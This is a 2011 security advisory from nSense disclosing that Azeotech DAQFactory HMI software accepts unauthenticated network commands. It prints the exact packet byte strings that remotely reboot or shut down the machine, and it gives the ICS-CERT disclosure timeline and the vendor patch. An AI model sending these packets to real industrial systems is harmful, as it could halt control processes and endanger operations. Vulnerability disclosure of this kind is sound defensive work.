nSense Vulnerability Research Security Advisory NSENSE-2011-004 --------------------------------------------------------------- Affected Vendor: Azeotech Affected Product: DAQFactory Platform: Windows Impact: Remote reboot/shutdown Vendor response: Patch CVE: None Credit: Knud / nSense Technical details --------------------------------------------------------------- The default configuration allows network connections towards the HMI without authentication. This allows an attacker on the network to shut down the machine running the HMI software by sending a packet as outlined below: preamble: "\x01\x00\x09\x00CPassword\x00" reboot: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00" shutdown: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00" Timeline: 20110412 Contacted ICS-CERT 20110413 ICS-CERT acknowledges receipt of information 20110413 ICS-CERT creates ticket,# ICS-VU-240775 20110502 Vendor creates patch, releases advisory to customers 20110625 ICS-CERT releases advisory 20110727 Vendor responds, CVE assigned, patch 20110809 Solution Install the latest version from the vendor: http://www.azeotech.com/downloads.php Links: http://www.nsense.fi http://www.nsense.dk $$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s. $$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$ $$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$ $$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P D r i v e n b y t h e c h a l l e n g e _